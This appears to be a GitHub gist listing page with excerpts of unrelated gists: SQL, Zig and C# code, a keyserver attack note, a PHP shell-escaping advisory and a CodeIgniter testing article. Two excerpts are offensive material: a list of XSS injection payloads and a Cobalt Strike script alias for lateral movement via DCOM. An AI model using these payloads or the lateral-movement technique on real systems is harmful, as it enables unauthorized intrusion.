Skip to content

Instantly share code, notes, and snippets.

View AlbinoDrought's full-sized avatar
🇨🇦
Use AGPL

Sean AlbinoDrought

🇨🇦
Use AGPL
45 followers · 91 following
View GitHub Profile
@slotrans
slotrans / history_stuff.sql
Created August 6, 2021 23:50
Building blocks for generic history-keeping in Postgres.
/*
Replace "your_schema" with whatever schema is appropriate in your environment.
It is possible to use "public"... but you shouldn't!
*/
/*
Function to stamp a "modified" timestamp. Adjust the name to suit your environment,
but that name is hard-coded so it is assumed that you only use _one_ such name.
@andrewrk
andrewrk / basic-tcp-chat.zig
Last active December 23, 2023 23:46
const std = @import("std");
const net = std.net;
const fs = std.fs;
const os = std.os;
pub const io_mode = .evented;
pub fn main() anyerror!void {
var general_purpose_allocator = std.heap.GeneralPurposeAllocator(.{}){};
const allocator = &general_purpose_allocator.allocator;
@rjhansen
rjhansen / keyservers.md
Last active April 14, 2024 12:28
SKS Keyserver Network Under Attack

SKS Keyserver Network Under Attack

This work is released under a Creative Commons Attribution-NoDerivatives 4.0 International License.

Terminological Note

"OpenPGP" refers to the OpenPGP protocol, in much the same way that HTML refers to the protocol that specifies how to write a web page. "GnuPG", "SequoiaPGP", "OpenPGP.js", and others are implementations of the OpenPGP protocol in the same way that Mozilla Firefox, Google Chromium, and Microsoft Edge refer to software packages that process HTML data.

Who am I?

@AlbinoDrought
AlbinoDrought / creamy-things-to-make.md
Last active August 4, 2023 15:39
Creamy Things To Make ™️

Creamy Things

  • SkipTheDishes tracker (No longer used)
  • 🎊 Some ghetto NextCloud clone that I feel safe selfhosting (probably read only) (video version here, working and in use) (file version WIP)
  • yet another IRC client for the 21st century
  • selfhosted screensharing thing (like rabb.it, but not) alternative exists: https://github.com/m1k1o/neko
  • a modern browser that isn't rounded
  • some way to import normal cams to unify Unifi Video is losing support, moving to something like Shinobi instead (ctrl-f NVR)
  • foss modern feedback tracker thing (can io)
  • visual dice rolling bot to make hard life choices for me
@AlbinoDrought
AlbinoDrought / .tigrc
Last active October 9, 2018 16:13
My basic af .tigrc
# Press ctrl+a to amend the last commit with whatever is staged
bind status <Ctrl-A> !git commit --amend
# Press shift+p to push
# requires `git config --global push.default current`
bind status P !git push -u
@kurobeats
kurobeats / xss_vectors.txt
Last active April 22, 2024 21:26
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@fuba82
fuba82 / AudioManager.cs
Last active August 14, 2023 11:29 — forked from sverrirs/AudioManager.cs
using System;
using System.Runtime.InteropServices;
// ReSharper disable SuspiciousTypeConversion.Global
// ReSharper disable InconsistentNaming
namespace AudioController
{
/// <summary>
/// Controls audio using the Windows CoreAudio API
/// from: http://stackoverflow.com/questions/14306048/controling-volume-mixer
@rsmudge
rsmudge / comexec.cna
Created January 6, 2017 22:06
Lateral Movement with the MMC20.Application COM Object (Aggressor Script Alias)
# Lateral Movement alias
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
# register help for our alias
beacon_command_register("com-exec", "lateral movement with DCOM",
"Synopsis: com-exec [target] [listener]\n\n" .
"Run a payload on a target via DCOM MMC20.Application Object");
# here's our alias to collect our arguments
alias com-exec {
@Zenexer
Zenexer / escapeshellrce.md
Last active November 2, 2023 06:09
Security Advisory: PHP's escapeshellcmd and escapeshellarg are insecure

Paul Buonopane paul@namepros.com at NamePros
PGP: https://keybase.io/zenexer

I'm working on cleaning up this advisory so that it's more informative at a glance. Suggestions are welcome.

This advisory addresses the underlying PHP vulnerabilities behind Dawid Golunski's [CVE-2016-10033][CVE-2016-10033], [CVE-2016-10045][CVE-2016-10045], and [CVE-2016-10074][CVE-2016-10074]. It assumes prior understanding of these vulnerabilities.

This advisory does not yet have associated CVE identifiers.

Summary

@samkeen
samkeen / TestingCodeigniter.md
Created August 12, 2011 14:54
Article describing how to test Codeigniter apps

(Integration) Test Infecting Codeigniter

Intro

This is not an article on the theoretical proper way to implement a testing policy and/or infrastructure. This is much more real world than that. This is about finding yourself in a situation were you need to refactor or add features to an existing substantial code base. Before undertaking such an adventure you would like to lay down some tests for regression purposes. The hitch is that the code is in a framework that hasn't put testing support first.

Many PHP frameworks qualify for the statement above but the one we will talk about in this article is Codeigniter. I wont use this article to debate the quality of the Codeigniter code base. It is what it is and finds itself used for a very many (in production) websites. What this article is about is addressing the situation that there are many developers out there that may find themselves working on a product utilizing a framework such as Codeigniter